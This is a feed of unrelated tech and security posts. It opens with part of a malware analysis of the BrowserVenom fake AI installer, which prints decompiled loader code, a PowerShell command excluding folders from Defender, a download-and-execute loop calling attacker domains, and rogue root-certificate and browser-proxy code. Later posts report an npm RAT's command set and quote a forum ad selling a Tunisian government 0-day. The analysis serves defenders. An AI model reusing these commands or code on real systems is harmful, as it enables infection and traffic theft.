private async void lmBtn_Click(object sender, EventArgs e)
{
try
{
MainFrm.<>c__DisplayClass5_0 CS$<>8__locals1 = new MainFrm.<>c__DisplayClass5_0();
this.lmBtn.Text = "Downloading..";
this.lmBtn.Enabled = false;
Action action;
if ((action = MainFrm.<>O.<0>__Run) == null)
{
action = (MainFrm.<>O.<0>__Run = new Action(Runner.Run)); # <--- malware initialization
}
Task.Run(action);
CS$<>8__locals1.ollamaPath = Path.Combine(Path.GetTempPath(), "LM-Studio-0.3.9-6-x64.exe");
[...]
When the MLInstaller.Runner.Run() function is executed in a separate thread on the machine, the infection develops in the following three steps:

1. First, the malicious function tries to exclude the user’s folder from Windows Defender’s protection by decrypting a buffer using the AES encryption algorithm.
   The AES encryption information is hardcoded in the implant:

   Type	AES-256-CBC
   Key	01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f 10 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f 20
   IV	01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f 10

   The decrypted buffer contains a PowerShell command that performs the exclusion once executed by the malicious function.
   powershell.exe -inputformat none -outputformat none -NonInteractive -ExecutionPolicy Bypass -Command Add-MpPreference -ExclusionPath $USERPROFILE
   It should be noted that this command needs administrator privileges and will fail in case the user lacks them.

2. After that, another PowerShell command runs, downloading an executable from a malicious domain whose name is derived with a simple domain generation algorithm (DGA). The downloaded executable is saved as %USERPROFILE%\Music\1.exe under the user’s profile and then executed.$ap = "/api/getFile?fn=lai.exe";
   $b = $null;
   foreach($i in 0..1000000) {
   $s = if ($i - gt 0) {
   $i
   } else {
   ""
   };
   $d = "https://app-updater$s.app$ap";
   $b = (New - Object Net.WebClient).DownloadData($d);
   if ($b) {
   break
   }

   };
   if ([Runtime.InteropServices.RuntimeEnvironment]::GetSystemVersion() - match"^v2") {
   [IO.File]::WriteAllBytes("$env:USERPROFILE\Music\1.exe", $b);
   Start - Process "$env:USERPROFILE\Music\1.exe" - NoNewWindow
   } else {
   ([Reflection.Assembly]::Load($b)).EntryPoint.Invoke($null, $null)
   }
   At the moment of our research, there was only one domain in existence: app-updater1[.]app. No binary can be downloaded from this domain as of now but we suspect that this might be another malicious implant, such as a backdoor for further access. So far, we have managed to obtain several malicious domain names associated with this threat; they are highlighted in the IoCs section.

3. Then the MLInstaller.Runner.Run() function locates a hardcoded stage two payload in the class and variable ConfigFiles.load of the malicious installer’s buffer. This executable is decrypted with the same AES algorithm as before in order to be loaded into memory and run.

Loaded implant: BrowserVenom

We dubbed the next-stage implant BrowserVenom because it reconfigures all browsing instances to force traffic through a proxy controlled by the threat actors. This enables them to sniff sensitive data and monitor the victim’s browsing activity while decrypting their traffic.

First, BrowserVenom checks if the current user has administrator rights – exiting if not – and installs a hardcoded certificate created by the threat actor:
[...]
X509Certificate2 x509Certificate = new X509Certificate2(Resources.cert);
if (RightsChecker.IsProcessRunningAsAdministrator())
{
StoreLocation storeLocation = StoreLocation.LocalMachine;
X509Store x509Store = new X509Store(StoreName.Root, storeLocation);
x509Store.Open(OpenFlags.ReadWrite);
x509Store.Add(x509Certificate);
[...]
Then the malware adds a hardcoded proxy server address to all currently installed and running browsers. For Chromium-based instances (i.e., Chrome or Microsoft Edge), it adds the proxy-server argument and modifies all existent LNK files, whereas for Gecko-based browsers, such as Mozilla or Tor Browser, the implant modifies the current user’s profile preferences:
[...]
new ChromeModifier(new string
[] {
"chrome.exe", "msedge.exe", "opera.exe", "brave.exe", "vivaldi.exe", "browser.exe", "torch.exe", "dragon.exe", "iron.exe", "epic.exe",
"blisk.exe", "colibri.exe", "centbrowser.exe", "maxthon.exe", "coccoc.exe", "slimjet.exe", "urbrowser.exe", "kiwi.exe"
}, string.Concat(new string
[] {
"--proxy-server=\"",
ProfileSettings.Host,
":",
ProfileSettings.Port,
"\""
})).ProcessShortcuts();
GeckoModifier.Modify();
[...]
The settings currently utilized by the malware are as follows:
public static readonly string Host = "141.105.130[.]106";
public static readonly string Port = "37121";
public static readonly string ID = "LauncherLM";
public static string HWID = ChromeModifier.RandomString(5);
The variables Host and Port are the ones used as the proxy settings, and the ID and HWID are appended to the browser’s User-Agent, possibly as a way to keep track of the victim’s network traffic.

Conclusion

As we have been reporting, DeepSeek has been the perfect lure for attackers to attract new victims. Threat actors’ use of new malicious tooling, such as BrowserVenom, complicates the detection of their activities. This, combined with the use of Google Ads to reach more victims and look more plausible, makes such campaigns even more effective.

At the time of our research, we detected multiple infections in Brazil, Cuba, Mexico, India, Nepal, South Africa, and Egypt. The nature of the bait and the geographic distribution of attacks indicate that campaigns like this continue to pose a global threat to unsuspecting users.

To protect against these attacks, users are advised to confirm that the results of their searches are official websites, along with their URLs and certificates, to make sure that the site is the right place to download the legitimate software from. Taking these precautions can help avoid this type of infection.

Kaspersky products detect this threat as HEUR:Trojan.Win32.Generic and Trojan.Win32.SelfDel.iwcv.

Indicators of Compromise

Hashes

d435a9a303a27c98d4e7afa157ab47de AI_Launcher_1.21.exe
dc08e0a005d64cc9e5b2fdd201f97fd6

Domains and IPs

securelist.com/browservenom-mi…

Sometimes, when making a 3D printed object, plastic just isn’t enough. Probably the most common addition to our prints is the ubiquitous brass threaded inset, which has proven its worth time and again over the years in providing a secure screw attachment point with less hassle than a captive nut. Of course to insert these bits of machined brass, you need to press them in, and unless you’ve got a very good hand with a soldering iron it’s usually a good idea to use a press of some sort. [TimNummy] shows us that, ironically enough, making such a press is perfectly doable using only printed parts. Well, save for the soldering iron, of course.

He calls it the Superserter. Not only is it 100% printed plastic, but the entire design fits on a single 256 mm by 256 mm bed. In his case it was done on the Bambulab X1C, but it’s a common enough print bed size and can be printed without any supports. It’s even sized to fit the popular Gridfinity standard for a neat and tidy desk and handy bin placement for the inserts.

[TimNummy] clearly spent some time thinking about design for 3D printed manufacturing in order to create an assembly that does not need linear rails, sliders, or bearings as other press projects often do. The ironic thing is that if that same amount of effort went into other designs, it might eliminate the need for threaded inserts entirely.

If you haven’t delved into the world of threaded inserts, we put up a how-to-guide a few years ago. If you’re wondering if you can get away with just printing threads, the answer is “maybe”– we highlighted a video comparing printed threads with different inserts a while back to get you started thinking about the design limitations there.

youtube.com/embed/xoMrW3jdhm8?…

hackaday.com/2025/06/11/thread…

Our hacker [Valve Child] wrote in to let us know about his Back to the Future lunchbox cyberdeck.

Great Scott! This is so awesome. We’re not sure what we should say, or where we should begin. A lot of you wouldn’t have been there, on July 3rd, 1985, nearly forty years ago. But we were there. Oh yes, we were there. On that day the movie Back to the Future was released, along with the hit song from its soundtrack: Huey Lewis & The News – The Power Of Love.

For the last forty years Back to the Future has been inspiring nerds and hackers everywhere with its themes of time-travel and technology. If you know what to look for you will find references to the movie throughout nerd culture. The OUTATIME number plate behind Dave Jones in the EEVblog videos? Back to the Future. The Flux Capacitor for sale at the Australian electronics store Jaycar? Back to the Future. The EEVblog 121GW Multimeter? Back to the Future. But it’s not just those kooky Australians, it’s all over the place including Rick and Morty, The Big Bang Theory, Ready Player One, Family Guy, The Simpsons, Futurama, Marvel’s Avengers: Endgame, LEGO Dimensions, and more.

As [Valve Child] explains he has built this cyberdeck for use on his work bench from a lunchbox gifted to him by his children last Christmas. His cyberdeck is based on the Raspberry Pi 5 and includes a cool looking and completely unnecessary water cooling system, a flux capacitor which houses the power supply, voltage and current meters, an OLED display for temperature and other telemetry, a bunch of lighting for that futuristic aesthetic, and a Bluetooth boombox for 80’s flair. Click through to watch the video demonstration of this delightfully detailed cyberdeck and if you want check out the extra photos too.

We ran a search for “Back to the Future” in the Hackaday archives and found 73 articles that mentioned the movie! Over the years we’ve riffed on hoverboards, calculator watches, the DeLorean, and the slick Mr. Fusion unit; and long may we continue.

hackaday.com/2025/06/10/back-t…

Nel mondo sotterraneo della cybercriminalità, esistono figure meno note ma fondamentali per orchestrare attacchi di vasta scala: gli Initial Access Broker (IAB). A differenza dei gruppi ransomware o dei malware-as-a-service, gli IAB non colpiscono direttamente, ma forniscono l’accesso iniziale alle infrastrutture compromesse.

Sono i trafficanti di porte d’ingresso per tutto ciò che può venire dopo: furti di dati, ransomware, spionaggio.

Uno degli esempi più inquietanti è emerso di recente da un forum underground, dove l’utente DedSec ha messo in vendita una 0-day nei sistemi critici del governo tunisino, dichiarando apertamente: “Offro una 0day critico in un sistema governativo tunisino che garantisce accesso a quasi tutti i portali E-Government… DGI, CNSS, CNAM, poste, banche, settori militari.”

Il prezzo? Due milioni di dollari, con tanto di supporto incluso: un piano d’attacco già pronto per sfruttare la vulnerabilità.
Sto offrendo un 0day critico e di alto valore in un sistema governativo tunisino che contiene tutto ciò che si desidera, tranne la modifica di alcune cose come la modifica delle proprietà (ma è possibile se si scala). Questo include l'accesso a quasi tutti i portali di E-Government e, a seconda del portale e dei privilegi dell'utente, è possibile avviare richieste ufficiali, modificare dati, estrarre dati, accedere a conti bancari e altro ancora. Inoltre, come regalo da parte nostra, vi daremo un piano pronto per sfruttarlo.

Alcuni esempi di portali E-Gov:

l'Autorità fiscale tunisina (DGI), la Cassa nazionale di previdenza sociale (CNSS), la Cassa nazionale di assicurazione malattia (CNAM), le Poste tunisine, i settori dell'istruzione, le banche, alcuni settori militari e altro ancora.

Avvertenze: Non posso dire tutto ciò che si può ottenere (dati), ma tutto ciò che un utente o un cittadino tunisino in questi luoghi può fare e ancora una volta dipende dal luogo e dal privilegio che l'utente ha.

Non mostrerò alcuna prova né dirò alcuna informazione sul sistema finché non pagherete, allora la prova sarà la vuln. una volta che ne avrete verificato la validità, potremo continuare. Come ho detto, accetto gli intermediari, quindi non preoccupatevi dei vostri soldi.

Prezzo: $2M

E se lo vuoi solo per te stesso possiamo parlarne in pm.

IAB: chi sono e perché sono pericolosi

Gli Initial Access Broker sono intermediari criminali specializzati nel violare sistemi informatici per poi rivendere l’accesso ad altri attori malevoli. Questi ultimi possono essere:

• gruppi ransomware,
• agenti di minacce nazionali (APT),
• criminali interessati a frodi bancarie,
• truffatori specializzati in furti d’identità,
• attori che cercano accesso persistente a infrastrutture critiche.

Un IAB non ha bisogno di sfruttare direttamente la falla. Il suo compito è quello di scovare la vulnerabilità, penetrarla silenziosamente, e poi metterla sul mercato. In molti casi, sfruttano vulnerabilità 0-day, cioè sconosciute anche ai fornitori di software. Nel caso del governo tunisino, DedSec afferma che con questa 0-day sia possibile:

• estrarre dati da enti fiscali, previdenziali, educativi e sanitari,
• accedere a conti bancari,
• modificare dati personali,
• presentare richieste ufficiali a nome di altri cittadini,
• e persino accedere a settori militari sensibili.

La pericolosità non risiede solo nel danno economico o nella violazione della privacy, ma nel fatto che questo tipo di accesso potrebbe essere usato da attori geopolitici per destabilizzare intere nazioni.

L’importanza della Cyber Threat Intelligence (CTI)

È proprio in scenari come questo che la Cyber Threat Intelligence diventa essenziale. Le CTI permettono a governi e aziende di:

• intercettare post nei forum underground come quello di DedSec,
• monitorare la vendita di exploit o accessi,
• riconoscere pattern ricorrenti tra IAB,
• valutare il rischio reale prima che gli exploit vengano utilizzati,
• allertare i CERT nazionali e mitigare la vulnerabilità prima che sia troppo tardi.

Una CTI efficace consente non solo di reagire, ma di prevenire, evitando che un accesso iniziale diventi un attacco su larga scala. La figura degli Initial Access Broker è spesso invisibile al grande pubblico, ma rappresenta la miccia che accende il fuoco. In un contesto dove una vulnerabilità venduta per 2 milioni di dollari può compromettere l’intera infrastruttura digitale di uno Stato, la minaccia non può più essere sottovalutata.

La difesa non può più essere reattiva.

Serve intelligence, monitoraggio costante e collaborazione internazionale. Prima che l’accesso diventi un attacco.

L'articolo Gli Initial Access Broker minacciano la Sicurezza nazionale. Accesso al governo tunisino in vendita proviene da il blog della sicurezza informatica.

It is a good bet that if most scientists and engineers were honest, they would most like to leave something behind that future generations would remember. While Marie Curie met that standard — she was the first woman to win the Nobel prize because of her work with radioactivity, and a unit of radioactivity (yes, we know — not the SI unit) is a Curie. However, Curie also left something else behind inadvertently: radioactive residue. As the BBC explains, science detectives are retracing her steps and facing some difficult decisions about what to do with contaminated historical artifacts.

Marie was born in Poland and worked in Paris. Much of the lab she shared with her husband is contaminated with radioactive material transferred by the Curies’ handling of things like radium with their bare hands.

Some of the traces have been known for years, including some on the lab notebooks the two scientists shared. However, they are still finding contamination, including at her family home, presumably brought in from the lab.

There is some debate about whether all the contamination is actually from Marie. Her daughter, Irène, also used the office. The entire story starts when Marie realized that radioactive pitchblende contained uranium and thorium, but was more radioactive than those two elements when they were extracted. The plan was to extract all the uranium and thorium from a sample, leaving this mystery element.

It was a solid plan, but working in a store room and, later, a shed with no ventilation and handling materials bare-handed wasn’t a great idea. They did isolate two elements: polonium (named after Marie’s birth country) and radium. Research eventually proved fatal as Marie succumbed to leukemia, probably due to other work she did with X-rays. She and her husband are now in Paris’ Pantheon, in lead-lined coffins, just in case.

If you want a quick video tour of the museum, [Sem Wonders] has a video you can see, below. If you didn’t know about the Curie’s scientist daughter, we can help you with that. Meanwhile, you shouldn’t be drinking radium.

youtube.com/embed/Js2mFBrCoRU?…

hackaday.com/2025/06/10/what-m…

The CherryTree-modded card next to the original RTX 2070 GPU. (Credit: Gamers Nexus)
In the olden days of the 1990s and early 2000s, PCs were big and videocards were small-ish add-in boards that blended in with other ISA, PCI and AGP cards. These days, however, videocards are big and computers are increasingly smaller. That’s why US-based CherryTree Computers did what everyone has been joking about, and installed a PC inside a GPU, with [Gamers Nexus] having the honors of poking at the creatively titled GeeFarce 5027POS Micro Computer.

As CherryTree describes it on their website, this one-off build was the result of a joke about how GPUs nowadays are more expensive than the rest of the PC combined. Thus they did what any reasonable person would do and put an Asus NUC 13 with a 13th gen Core i7, 64 GB of and 2 TB of NVMe storage inside an (already dead) Asus Aorus RTX 2070 GPU.

In the [Gamers Nexus] video we can see that it’s definitely a quick-and-dirty build, with plenty of heatshrink and wires running everywhere in addition to the chopped off original heatsink. That said, from a few meter away it still looks like a GPU, can be installed like a GPU (but the PCIe connector does nothing) and is in the end a NUC PC inside a GPU shell that you can put a couple of inside a PC case.

Presumably the next project we’ll see in this vein will see a full-blown x86 system grafted inside a still functioning GPU, which would truly make the ‘install the PC inside the GPU’ meme a reality.

youtube.com/embed/wAmu_HnQAo8?…

hackaday.com/2025/06/10/using-…

Until recently, hobby-grade digital oscilloscopes were mostly, at most, 8-bit sampling. However, newer devices offer 12-bit conversion. Does it matter? Depends. [Kiss Analog] shows where a 12-bit scope may outperform an 8-bit one.

It may seem obvious, of course. When you store data in 8-bit resolution and zoom in on it, you simply have less resolution. However, seeing the difference on real data is enlightening.

To perform the test, he used three scopes to freeze on a fairly benign wave. Then he cranked up the vertical scale and zoomed in horizontally. The 8-bit scopes reveal a jagged line where the digitizer is off randomly by a bit or so. The 12-bit was able to zoom in on a smooth waveform.

Of course, if you set the scope to zoom in in real time, you don’t have that problem as much, because you divide a smaller range by 256 (the number of slices in 8 bits). However, if you have that once-in-a-blue-moon waveform captured, you might appreciate not having to try to capture it again with different settings.

A scope doesn’t have to be physically large to do a 12-bit sample. Digital sampling for scopes has come a long way.

youtube.com/embed/jHYlL08O5IQ?…

hackaday.com/2025/06/10/two-bi…

Everyone loves to play with electricity and plasma, and [Hyperspace Pirate] is no exception. Inspired by a couple of 40×20 N52 neodymium magnets he had kicking around, he decided to put together a hand-cranked generator and use it to generate plasma with. Because that’s the kind of fun afternoon projects that enrich our lives, and who doesn’t want some Premium Fire to enrich their lives?

The generator itself is mostly 3D printed, with the magnets producing current in eight copper coils as they spin past. Courtesy of the 4.5:1 gear on the crank side, it actually spins at over 1,000 RPM with fairly low effort when unloaded, albeit due to the omission of iron cores in the coils. This due to otherwise the very strong magnets likely cogging the generator to the point where starting to turn it by hand would become practically impossible.

Despite this, the generator produces over a kilovolt with the 14,700 turns of 38 AWG copper wire, which is enough for the voltage multiplier and electrodes in the vacuum chamber, which were laid out as follows:
Circuit for the plasma-generating circuit with a vacuum chamber & hand-cranked generator. (Credit: Hyperspace Pirate, YouTube)
Some of our esteemed readers may be reminded of arc lighters which are all the rage these days, and this is basically the hand-cranked, up-scaled version of that. Aside from the benefits of having a portable super-arc lighter that doesn’t require batteries, the generator part could be useful in general for survival situations. Outside of a vacuum chamber the voltage required to ionize the air becomes higher, but since you generally don’t need a multi-centimeter arc to ignite some tinder, this contraption should be more than sufficient to light things on fire, as well as any stray neon signs you may come across.

If you’re looking for an easier way to provide some high-voltage excitement, automotive ignition coils can be pushed into service with little more than a 555 timer, and if you can get your hands on a flyback transformer from a CRT, firing them up is even easier.

youtube.com/embed/CLX_pQbSFFg?…

hackaday.com/2025/06/10/genera…

It’s easy to think of commercial products as black boxes, built with proprietary hardware that’s locked down from the factory. However, that’s not always the case. A great many companies are now turning out commercial products that rely on the very same microcontrollers that hackers and makers use on the regular, making them far more accessible for the end user to peek inside and poke around a bit.

Jim Scarletta has been doing just that with a wide variety of off-the-shelf gear. He came down to the 2024 Hackaday Superconference to tell us all about how you can repurpose ESP32-based commercial products.

Drop It Like It’s Hot

youtube.com/embed/2GC19HOr6AI?…

Jim starts off this talk by explaining just why the ESP32 is so popular. Long story short, it’s a powerful and highly capable microcontroller that can talk WiFi and Bluetooth out of the box and costs just a few bucks even in small quantities. That makes it the perfect platform for all kinds of modern hardware that might want to interact with smartphones, the Internet, or home networks at some point or other. It’s even got hardware accelerated cryptography built-in. It’s essentially a one-stop shop for building something connected.
Jim notes that while some commercial ESP32-based products are easy to disassemble and work with, others can be much harder to get into. He had particular trouble with some variants of a smartbulb that differed inside from what he’d expected.
You might ask why you’d want to repurpose a commercial product that has an ESP32 in it, when even fully-built devboards are relatively cheap. “It’s fun!” explains Jim. Beyond that, he notes there are other reasons, too.

You might like re-configuring a commercial product that doesn’t quite do what you want, or you might want to restore functionality to a device that has been deactivated or is no longer supported by its original manufacturer. You can even take a device with known security vulnerabilities and patch them or rebuild them with a firmware that isn’t so horridly dangerous.

It’s also a great way to reuse hardware and stop it becoming e-waste. Commercial hardware often comes with great enclosures, knobs, buttons, and screens that are far nicer than what most of us can whip up in our home labs. Repurposing a commercial product to do something else can be a really neat way to build a polished project.
While we often think of Apple’s ecosystem as a closed shop, Jim explains that you can actually get ESP32 hardware hooked up with HomeKit if you know what you’re doing.
Jim then explains how best to pursue your goal of repurposing a commercial product based on the ESP32. He suggests starting with an ESP32 devboard to learn the platform and how it works. He also recommends researching the product’s specifications so you can figure out what it’s got and how it all works.

Once you’ve got into the thing, you can start experimenting to create your hacked prototype device, but there’s one more thing he reckons you should be thinking about. It’s important to have a security plan from the beginning. If you’re building a connected device, you need to make sure you’re not putting something vulnerable on your home network that could leave you exposed.

You also need to think about physical safety. A lot of ESP32 devices run on mains power—smart bulbs, appliances, and the like. You need to know what you’re doing and observe the proper safety precautions before you go tinkering with anything that plugs into the hot wires coming out of the wall. It’s outside the scope of Jim’s talk to cover this in detail, but you’re well advised to do the reading and learn from those more experienced before you get involved with mains-powered gear.
Jim uses the Shelly as a great example of a commercial ESP32-based product. Credit: via eBay
The rest of Jim’s talk covers the practical details of working with the ESP32. He notes that it’s important to think about GPIO pin statuses at startup, and to ensure you’re not mixing up 5 V and 3.3 V signals, which is an easy way to release some of that precious Magic Smoke.

He also outlines the value of using tools like QEMU and Wokwi for emulation, in addition to having a simple devboard for development purposes. He explores a wide range of other topics that may be relevant to your hacking journey—using JTAG for debugging, working with Apple HomeKit, and even the basics of working with SSL and cryptography. And, naturally, he shows off some real ESP32-based products that you can go out and buy and start tinkering with right away!

Jim’s talk was one of the longer ones, and absolutely jam packed with information at that. No surprise given the topic is such a rich one. We’re blessed these days that companies are turning out all sorts of hackable devices using the popular ESP32 at their heart. They’re ripe for all kinds of tinkering; you just need to be willing to dive in, poke around, and do what you want with them!

hackaday.com/2025/06/10/superc…

Communicating with space-based ham radio satellites might sound like it’s something that takes a lot of money, but in reality it’s one of the more accessible aspects of the hobby. Generally all that’s needed is a five-watt handheld transceiver and a directional antenna. Like most things in the ham radio world, though, it takes a certain amount of skill which can’t be easily purchased. Most hams using satellites like these will rely on some software to help track them, which is where this new program from [Alex Shovkoplyas] comes in.

The open source application is called SkyRoof and provides a number of layers of information about satellites aggregated into a single information feed. A waterfall diagram is central to the display, with not only the satellite communications shown on the plot but information about the satellites themselves. From there the user can choose between a number of other layers of information about the satellites including their current paths, future path prediction, and a few different ways of displaying all of this information. The software also interfaces with radios via CAT control, and can even automatically correct for the Doppler shift that is so often found in satellite radio communications.

For any ham actively engaged in satellite tracking or space-based repeater communications, this tool is certainly worth trying out. Unfortunately, it’s only available for Windows currently. For those not looking to operate under Microsoft’s thumb, projects such as DragonOS do a good job of collecting up the must-have Linux programs for hams and other radio enthusiasts.

hackaday.com/2025/06/10/skyroo…

Everyone these days wants to talk about Small Modular Reactors (SMRs) when it comes to nuclear power. The industry seems to have pinned its hopes for a ‘nuclear renaissance’ on the exciting new concept. Exciting as it may be, it is not exactly new: small reactors date back to the heyday of the atomic era. There were a few prototypes, and a lot more paper projects that are easy to sneer at today. One in particular caught our eye, in a write-up from Steve Wientz, that is described as an atomic outboard motor.

It started as an outgrowth from General Electric’s 1950s work on airborne nuclear reactors. GE’s proposal just screams “1950s” — a refractory, air-cooled reactor serving as the heat source for a large turboprop engine. Yes, complete with open-loop cooling. Those obviously didn’t fly (pun intended, as always) but to try and recoup some of their investment GE proposed a slew of applications for this small, reactor-driven gas turbine. Rather than continue to push the idea of connecting it to a turboprop and spew potentially-radioactive exhaust directly into the atmosphere, GE proposed podding up the reactor with a closed-cycle gas turbine into one small, hermetically sealed-module.

Bolt-On Nuclear Power

There were two variants of a sealed reactor/turbine module proposed by GE: the 601A, which would connect the turbine to an electric generator, and 601B, which would connect it to a gearbox and bronze propeller for use as a marine propulsion pod. While virtually no information seems to have survived about 601A, which was likely aimed at the US Army, the marine propulsion pod is fairly well documented in comparison in GE-ANP 910: Application Studies, which was reviewed by Mark at Atomic Skies. There are many applications in this document; 601 is the only one a modern reader might come close to calling sane.
Cutaway diagram of the General Electric 601B
The pod would be slung under a ship or submarine, much like the steerable electric azimuth thrusters popular on modern cruise ships and cargo vessels. Unlike them, this pod would not require any electrical plant onboard ship, freeing up an immense amount of internal volume. It would almost certainly have been fixed in orientation, at least if it had been built in 1961. Now that such thrusters are proven technology though, there’s no reason an atomic version couldn’t be put on a swivel.
A modern electric azimuth thruster.
Two sizes were discussed, a larger pod 60″ in diameter and 360″ long (1.5 m by 9.1 m) that would have weighed 45,000 lbs (20 metric tonnes) and output 15,000 shp (shaft horse power, equivalent to 11 MW). The runtime would have been 5000 hours on 450 lbs (204 kg) of enriched uranium. This is actually comparable to the shaft power of a large modern thruster.

There was also a smaller, 45″ diameter version that would produce only 3750 shp (2796 kW) over the same runtime. In both, the working gas of the turbines would have been neon, probably to minimize the redesign required of the original air-breathing turbine.

Steve seems to think that this podded arrangement would create drag that would prove fatally noisy for a warship, but the Spanish Navy seems to disagree, given that they’re putting azimuth thrusters under their flagship. A submarine might be another issue, but we’ll leave that to the experts. The bigger problem with using these on a warship is the low power for military applications. The contemporary Farragut-class destroyers made 85,000 shp (63 MW) with their steam turbines, so the two-pod ship in the illustration must be both rather small and rather slow.
Concept Art of 601B propulsion pods under a naval vessel, art by General Electric
Of course putting the reactors outside the hull of the ship also makes them very vulnerable to damage. In the 1950s, it might have seemed acceptable that a reactor damaged in battle could simply be dumped onto the seafloor. Nowadays, regulators would likely take a dimmer view of just dropping hundreds of pounds of uranium and tonnes of irradiated metal into the open ocean.

Civilian Applications

Rather than warships, this sort of small, modular reactor sounds perfect for the new fleet of nuclear cargo ships the UN is pushing for to combat climate change. The International Maritime Organization’s goal of net-zero emissions by 2050 is just not going to happen without nuclear power or a complete rethink of our shipping infrastructure. Most of the planning right now seems to center on next-generation small modular reactors: everything from pebble-bed to thorium. This Cold War relic of an idea has a few advantages, though.

Need to refuel? Swap pods. Mechanical problems? Swap pods. The ship and its nuclear power plant are wholly separate, which ought to please regulators and insurers. Converting a ship to use azimuth thrusters is a known factor, and not a huge job in dry dock. There are a great many ships afloat today that will need new engines anyway if they aren’t to be scrapped early and the shipping sector is to meet its ambitious emissions targets. Pulling out their original power plants and popping ‘atomic outboards’ underneath might be the easiest possible solution.
The Sevmorput is currently the only operational nuclear merchant ship in the world. To meet emissions goals, we’ll need more.
Sure, there are disadvantages to dusting off this hack — and we think a good case can be made that turning a turboprop into a ship-sized outboard ought to qualify as a ‘hack’. For one thing, 5000 hours before refueling isn’t very long. Most commercial cargo ships can cruise at least that long in a single season. But if swapping the pods can be done in-harbor and not in dry dock, that doesn’t seem like an insurmountable obstacle. Besides, there’s no reason to stay 100% faithful to a decades-old design; more fuel capacity is possible.

For another, most of the shielding on these things would have been provided by seawater by design, which is going to make handling the pods out of water an interesting experience. You certainly would not want to see a ship equipped with these pods capsize. Not close up, anyway.

Rather than pass judgement, we ask if General Electric’s “atomic outboard” was just way ahead of its time. What do you think?

hackaday.com/2025/06/10/is-the…

Un altro grave attacco alla supply chain è stato scoperto in npm, che ha colpito 17 popolari pacchetti GlueStack @react-native-aria. Un codice dannoso che fungeva da trojan di accesso remoto (RAT) è stato aggiunto ai pacchetti, che sono stati scaricati più di un milione di volte.

L’attacco alla supply chain è stato scoperto da Aikido Security, che ha notato codice offuscato incorporato nel file lib/index.js dei seguenti pacchetti:

Poiché i pacchetti interessati sono molto diffusi e sono stati scaricati da circa 1.020.000 persone ogni settimana, i ricercatori hanno avvertito che l’attacco potrebbe avere gravi conseguenze.

Come segnalato dai giornalisti di BleepingComputer , la compromissione è iniziata la scorsa settimana, il 6 giugno 2025, quando una nuova versione del pacchetto @react-native-aria/focus è stata pubblicata su npm. Da allora, 17 dei 20 pacchetti @react-native-aria di GlueStack sono stati compromessi.

Secondo gli esperti, il codice dannoso è fortemente offuscato e viene aggiunto all’ultima riga del codice sorgente del file con un gran numero di spazi. Per questo motivo, non è facile da individuare visualizzando il codice sul sito web di npm.

I ricercatori hanno osservato che il codice dannoso è quasi identico a un trojan di accesso remoto scoperto il mese scorso durante le indagini su un altro attacco alla supply chain di npm.

Il malware incorporato nei pacchetti si connette al server di controllo degli aggressori e riceve da questo i comandi da eseguire. Tra questi:

• cd — cambia la directory di lavoro corrente;
• ss_dir — cambia la directory nel percorso dello script
• ss_fcd: — forza il cambio di directory in ;
• ss_upf:f,d — carica un singolo file f nella destinazione d;
• ss_upd:d,dest — scarica tutti i file dalla directory d alla destinazione dest;
• ss_stop – imposta un flag di stop che interrompe il processo di avvio corrente;
• qualsiasi altro input viene trattato come un comando shell ed eseguito tramite child_process.exec().

Inoltre, il trojan sostituisce anche la variabile d’ambiente PATH aggiungendo un percorso fittizio (%LOCALAPPDATA%\Programs\Python\Python3127) all’inizio. Questo consente al malware di intercettare silenziosamente le chiamate Python e PIP ed eseguire file binari dannosi.

Aikido Security ha provato a contattare gli sviluppatori di GlueStack e a segnalare la compromissione aprendo un problema su GitHub per ciascuno dei repository del progetto, ma non ha ricevuto risposta. Gli esperti hanno infine informato gli amministratori di npm del problema, ma il processo di rimozione richiede solitamente diversi giorni.

Gli esperti attribuiscono questo attacco agli aggressori che in precedenza avevano compromesso altri quattro pacchetti in npm: biatec-avm-gas-station, cputil-node, lfwfinance/sdk e lfwfinance/sdk-dev. Dopo che l’attacco è stato riportato dai media, gli sviluppatori di GlueStack hanno revocato il token di accesso utilizzato per pubblicare i pacchetti dannosi, che ora sono contrassegnati come deprecati in npm.

“Purtroppo, non è stato possibile rimuovere la versione compromessa a causa di pacchetti dipendenti”, ha scritto un rappresentante di GlueStack su GitHub. “Per precauzione, ho ritirato le versioni interessate e aggiornato l’ultimo tag in modo che punti alla versione precedente, sicura.”

L'articolo NPM sotto Attacco: Un Trojan RAT scaricato un milione di volte Infetta 17 Popolari Pacchetti JavaScript proviene da il blog della sicurezza informatica.

In a saga that brings to mind the hype and incidents with ReiserFS, [SavvyNik] takes us through the latest data corruption bug report and developer updates regarding the BcacheFS filesystem in the Linux kernel. Based on the bcache (block cache) cache mechanism in the Linux kernel, its author [Kent Overstreet] developed it into what is now known as BcacheFS, with it being announced in 2015 and subsequently merged into the Linux kernel (6.7) in early 2024. As a modern copy-on-write (COW) filesystem along the lines of ZFS and btfs, it was supposed to compete directly with these filesystems.

Despite this, it has become clear that BcacheFS is rather unstable, with frequent and extensive patches being submitted to the point where [Linus Torvalds] in August of last year pushed back against it, as well as expressing regret for merging BcacheFS into mainline Linux. As covered in the video, [Kent] has pushed users reporting issues to upgrade to the latest Linux kernel to get critical fixes, which really reinforces the notion that BcacheFS is at best an experimental Alpha-level filesystem implementation and should probably not be used with important data or systems.

Although one can speculate on the reasons for BcacheFS spiraling out of control like this, ultimately if you want a reliable COW filesystem in Linux, you are best off using btrfs or ZFS. Of course, regardless of which filesystem you use, always make multiple backups, test them regularly and stay away from shiny new things on production systems.

youtube.com/embed/gsJ4KM8rhSw?…

hackaday.com/2025/06/10/the-on…